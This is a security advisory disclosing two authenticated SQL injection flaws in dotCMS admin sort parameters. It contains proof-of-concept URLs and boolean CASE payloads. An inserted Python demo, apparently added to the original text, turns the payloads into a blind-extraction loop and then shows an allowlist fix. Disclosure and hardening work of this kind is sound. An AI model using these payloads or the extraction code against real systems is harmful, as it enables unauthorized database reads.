PACKETSTORM:146372

dotCMS SQL Injection

2018-02-1300:00:00
Elar Lang
packetstormsecurity.com

EPSS

0.001

Percentile

44.2%

Title: Multiple SQL injection vulnerabilities in dotCMS (2x CVE)  
Credit: Elar Lang / https://security.elarlang.eu  
Vendor/Product: dotCMS (http://dotcms.com/)  
Vulnerability: SQL injection  
Vulnerable version: before 4.1.1. A fix for the 3.x branch was planned for  
3.7.2 (not released at the time of disclosure)  
CVE: CVE-2016-10007, CVE-2016-10008  
  
  
# Multiple SQL injections in dotCMS framework.  
  
I had already reported 8 SQL injection vulnerabilities to dotCMS and I  
was curious as to how they fixed them.  
While checking the fixes I found 2 new vulnerabilities, but for those I had  
to bypass a blacklist defence.  
  
  
## CVE-2016-10007 - "Marketing > Forms" page,  
_EXT_FORM_HANDLER_orderBy parameter  
  
An SQL injection vulnerability in the "Marketing > Forms" screen in  
dotCMS 3.x before 3.7.2 (not released) and 4.x before 4.1.1 allows remote  
authenticated attackers to execute arbitrary SQL commands via the  
_EXT_FORM_HANDLER_orderBy parameter.  
  
Preconditions: the attacker must be authenticated and authorized as an  
administrator.  
  
Proof-of-Concept URL (from "Admin Site" UI: "Marketing > Forms", click  
on some column title in the resultset table):  
/c/portal/layout?p_l_id=89594b95-1354-4a63-8867-c922880107df&p_p_id=EXT_FORM_HANDLER&p_p_action=1&p_p_state=maximized&p_p_mode=view&_EXT_FORM_HANDLER_struts_action=%2Fext%2Fformhandler%2Fview_form&_EXT_FORM_HANDLER_orderBy=SQLi&_EXT_FORM_HANDLER_direction=asc  
  
Proof-of-Concept values for the parameter _EXT_FORM_HANDLER_orderBy.  
Precondition for this example: the resultset must contain at least 2  
rows, and ordering by the name field must give a different order than  
ordering by the description field (if it does not, use other field names).  
  
-- boolean true - output is ordered by name field  
_EXT_FORM_HANDLER_orderBy=case when 1=1 then name else description end  
  
-- boolean false - output is ordered by description field  
_EXT_FORM_HANDLER_orderBy=case when 1=0 then name else description end  
  
  
  
## CVE-2016-10008 - "Content Types > Content Types" page,  
_EXT_STRUCTURE_direction parameter  
  
An SQL injection vulnerability in the "Content Types > Content Types"  
screen in dotCMS 3.x before 3.7.2 (not released) and 4.x before 4.1.1 allows  
remote authenticated attackers to execute arbitrary SQL commands via the  
_EXT_STRUCTURE_direction parameter.  
  
Preconditions: the attacker must be authenticated and authorized as an  
administrator.  
  
Proof-of-Concept URL (from "Admin Site" UI: "Content Types > Content  
Types", click on some column title in the resultset table):  
demo.dotcms.com/c/portal/layout?p_l_id=56fedb43-dbbf-4ce2-8b77-41fb73bad015&p_p_id=EXT_STRUCTURE&p_p_action=1&p_p_state=maximized&p_p_mode=view&_EXT_STRUCTURE_struts_action=%2Fext%2Fstructure%2Fview_structure&_EXT_STRUCTURE_orderBy=velocity_var_name&_EXT_STRUCTURE_direction=SQLi  
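Both issues above are the same bug class: a request parameter that names a sort column (CVE-2016-10007, _EXT_FORM_HANDLER_orderBy) or a sort direction (CVE-2016-10008, _EXT_STRUCTURE_direction) is concatenated into the ORDER BY clause, and because identifiers and keywords cannot be bound as prepared-statement parameters, the only safe handling is an allowlist. The following is an added example, not dotCMS code and not the author's PoC tooling: it models the flaw against an in-memory SQLite table with constructed rows, turns the CASE-based orderBy payload from the advisory into a boolean oracle, uses that oracle to read a value character by character, shows one way the direction slot can also be turned into an oracle (a LIMIT expression, which is a SQLite-specific assumption here, not the payload the advisory used), and ends with the allowlist form of the query. Table and column names (form_handler, name, description, secret) are assumptions chosen for the demo.

```python
import sqlite3
import string

# Constructed sample data (not from dotCMS): two rows whose order by "name"
# differs from their order by "description", as the advisory's PoC requires.
# The "secret" column stands in for any value an attacker wants to read.
ROWS = [
    ("contact", "zeta form", "s3cr3t"),
    ("newsletter", "alpha form", "s3cr3t"),
]
BY_NAME = ["contact", "newsletter"]          # expected order when sorted by name


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE form_handler (name TEXT, description TEXT, secret TEXT)")
    conn.executemany("INSERT INTO form_handler VALUES (?, ?, ?)", ROWS)
    return conn


def vulnerable_list(conn, order_by, direction):
    # Hypothetical query shape mirroring the flaw: both request parameters are
    # pasted straight into ORDER BY. Identifiers cannot be bound with "?".
    sql = f"SELECT name FROM form_handler ORDER BY {order_by} {direction}"
    return [row[0] for row in conn.execute(sql)]


def order_by_oracle(conn, condition):
    # The advisory's payload: true -> sorted by name, false -> sorted by description.
    payload = f"case when {condition} then name else description end"
    return vulnerable_list(conn, payload, "asc") == BY_NAME


def direction_oracle(conn, condition):
    # Direction slot as an oracle (SQLite accepts an expression after LIMIT; this
    # is an assumption for the demo, not the advisory's own payload). The
    # condition decides whether 2 rows or 1 row come back.
    payload = f"asc limit (case when {condition} then 2 else 1 end)"
    return len(vulnerable_list(conn, "name", payload)) == 2


def extract_secret(conn, max_len=16, alphabet=string.ascii_lowercase + string.digits):
    # Blind extraction: one oracle query per (position, candidate character).
    out = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            cond = f"(select substr(secret, {pos}, 1) from form_handler limit 1) = '{ch}'"
            if order_by_oracle(conn, cond):
                out += ch
                break
        else:
            return out                       # no candidate matched: end of value
    return out


# Hardened form: allowlist both the column and the direction. A blacklist of
# keywords is the wrong tool here, since the attacker only needs an expression
# the filter did not anticipate; an allowlist leaves no free-form input at all.
ALLOWED_COLUMNS = {"name", "description"}
ALLOWED_DIRECTIONS = {"asc", "desc"}


def safe_list(conn, order_by, direction):
    if order_by not in ALLOWED_COLUMNS:
        raise ValueError(f"unsupported sort column: {order_by!r}")
    if direction.lower() not in ALLOWED_DIRECTIONS:
        raise ValueError(f"unsupported sort direction: {direction!r}")
    sql = f"SELECT name FROM form_handler ORDER BY {order_by} {direction.lower()}"
    return [row[0] for row in conn.execute(sql)]


def is_rejected(conn, order_by, direction):
    # True when the hardened query refuses the input.
    try:
        safe_list(conn, order_by, direction)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("orderBy oracle 1=1:", order_by_oracle(db, "1=1"))
    print("orderBy oracle 1=0:", order_by_oracle(db, "1=0"))
    print("direction oracle 1=1:", direction_oracle(db, "1=1"))
    print("extracted secret:", extract_secret(db))
    print("payload rejected by allowlist:",
          is_rejected(db, "case when 1=1 then name else description end", "asc"))
```

The extraction loop is deliberately naive (one request per candidate character); against a real target the same oracle would be driven with a binary search on the character code, but the point stands: a sort column the server cannot bind is enough for full blind read access, and it takes an allowlist, not a keyword blacklist, to close it.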
  
  
# Vulnerability Disclosure Timeline  
  
2016-10-24 | me > dotCMS | SQLi Poc  
2016-10-25 | dotCMS > me | Thanks for PoC  
  
2016-12-19 | me > dotCMS | Informed CVE numbers, asked status for  
reported issues.  
2016-12-19 | dotCMS > me | Low priority, not planning fixing in next release  
2016-12-19 | me > dotCMS | agreed with low priority (requires an  
authenticated user with administrator privileges)  
  
2017-03-03 | me > dotCMS | I can see many new releases, is it fixed? [2]  
2017-03-06 | dotCMS > me | No. Probably will not be addressed until  
the project to refactor our admin interface is completed.  
  
2017-06-16 | dotCMS | dotCMS version 4.1.1 release  
  
2017-07-18 | me > dotCMS | As I need to publish the CVEs at some point,  
what is the status?  
2017-07-21 | dotCMS > me | Fixes are available on 4.1.1. Would it be  
possible to wait 3 to 4 weeks so we can release 3.7.2?  
  
2017-10-10 | me > dotCMS | "3 to 4 weeks" have passed, how is it going with 3.7.2?  
2017-10-17 | dotCMS > me | "Thank you for your patience! Thank you for  
your email! It prompted me to push the developer to finish getting  
this release out the door. I will email you next week with an update."  
  
This "next week" never arrived ;)  
  
2018-02-11 | me | Full Disclosure on http://security.elarlang.eu  
  
  
# Related fixes and releases  
https://dotcms.com/docs/latest/change-log#release-4.1.1  
  
# More detailed (inc some code review and blacklist bypass)  
description is available in blog:  
https://security.elarlang.eu/cve-2016-10007-and-cve-2016-10008-2-sql-injection-vulnerabilities-in-dotcms-blacklist-defence-bypass.html  
  
--  
Elar Lang  
Blog @ https://security.elarlang.eu  
Pentester, lecturer @ http://www.clarifiedsecurity.com  
  
  
